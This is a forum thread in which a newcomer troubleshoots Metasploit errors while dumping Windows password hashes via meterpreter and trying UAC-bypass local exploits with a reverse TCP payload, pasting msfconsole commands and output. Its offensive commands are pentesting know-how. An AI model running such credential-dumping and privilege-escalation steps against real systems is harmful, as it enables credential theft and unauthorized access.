Hashdump gives a "NoMethodError" error?

[Ky6000]

When I try to use "run post/windows/gather/hashdump" on meterpreter I get a "NoMethodError", since i'm new to metasploit i'm probably doing something wrong.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method `unpack' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:44:in `run'

I get this error whenever I use the hashdump script. I have updated metasploit by using the msfupdate command, and updated kali by using "apt-get update, apt-get upgrade, apt-get dist-upgrade".

So why is hashdump doing this?

Thanks for any help.

[cooper]

Someone already reported it twice back in october.

https://github.com/rapid7/metasploit-framework/issues/6154
https://github.com/rapid7/metasploit-framework/issues/6160

No reactions to it as yet so I'm guessing the person in question had a botched install in some way and the Rapid7 crew are just ignoring him.

Try opening that hashdump.rb file and see what it's doing on line 44.

[Ky6000]

There is no difference between my hashdump.rb and the one on github. The error is occuring on this line:

      print_status("Calculating the hboot key using SYSKEY #{bootkey.unpack("H*")[0]}...")

interestingly, this is just printing to the console, so when I remove it I get a new error,

[*] Obtaining the boot key...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

Access is denied!!?

I thought a meterpreter session had root access. To use psexec I had to change the registry, do I need to change it again? Also it is saying to migrate into service process, is that svchost? Because I have insufficient privileges to migrate there too.

Some of what I'm saying may make no sense since I am new to this, for which I apologize.

Thanks for the reply.

[Ky6000]

Ok so I did a lot of research on elevating privileges, which seems to be the problem here. Is UAC the thing I need to bypass to get system? I've tried using the ask module "exploit/windows/local/ask' which looks like the most reliable exploit since its used in almost every video and website, but I get this error when I use it.

msf exploit(ask) > exploit

[*] Started reverse TCP handler on 10.0.2.15:4444 
[+] UAC is not enabled, no prompt for the user
[*] Uploading bOCAWzuRokL.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
msf exploit(ask) > 

Even though it says UAC is not enabled, I still get the prompt but anyway...

If I were to guess, I would say the exe wont run (also fails with the PSH technique). I initially thought the exploit was 32 bit on a 64 bit system, (which is an updated windows 10 build) but apparently it works for both types of architecture. Other exploits "exploit/windows/local/bypassuac", "exploit/windows/local/bypassuac_vbs" do not work with my build. And finally, with the exploit "exploit/windows/local/bypassuac_injection", I can't get it work because apparently I'm using a x86 target, when I'm certain that the target is x64. Also, I read online that someone fixed this by setting the payload to x64 bit (which doesn't make any sense, if the exploit relied on a payload, then why wouldn't it say that in the info or options?) but when I try to select to new payload I get:

msf exploit(ask) > set payload windows/x64/meterpreter/reverse_tcp
[-] The value specified for payload is not valid.

Which doesn't make any sense, because "set payload" gives:

msf exploit(ask) > set payload
payload => windows/meterpreter/reverse_tcp

As if its showing the default payload, which is 32 bit!

So now I'm out of options and ideas... If anyone can point me in the right direction and tell me what I'm doing wrong, I would really appreciate it.

[siG]

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method `unpack' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:44:in `run'

I had the same issue, seems that from meterpreter you can just run hashdump (worked like a charm)

[Rkiver]

While it's great that you found a solution, consider when this was last posted in...5 years ago.

[Irukandji]

15 hours ago, Rkiver said:

While it's great that you found a solution, consider when this was last posted in...5 years ago.

I think people have blinders on and don't pay attention to the date and time.

[siG]

On 11/23/2021 at 2:06 PM, Jtyle6 said:

I think people have blinders on and don't pay attention to the date and time.

 

On 11/22/2021 at 10:38 PM, Rkiver said:

While it's great that you found a solution, consider when this was last posted in...5 years ago.

Since there was no final answer and I had the same issue recently, and I found this topic searching for a solution, I thought that maybe someone who has the same problem, will also find the answer here.

At least my comment might or might not be useful, yours are useless for sure